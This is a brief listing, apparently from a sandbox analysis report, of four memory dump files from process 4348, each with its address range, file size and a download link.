memory/4348-2-0x0000000070D60000-0x0000000071510000-memory.dmp

Filesize
7.7MB

Download
memory/4348-1-0x0000000005360000-0x0000000005396000-memory.dmp

Filesize
216KB

Download
memory/4348-47-0x0000000070D60000-0x0000000071510000-memory.dmp

Filesize
7.7MB

Download
memory/4348-46-0x0000000070D6E000-0x0000000070D6F000-memory.dmp

Filesize
4KB

Download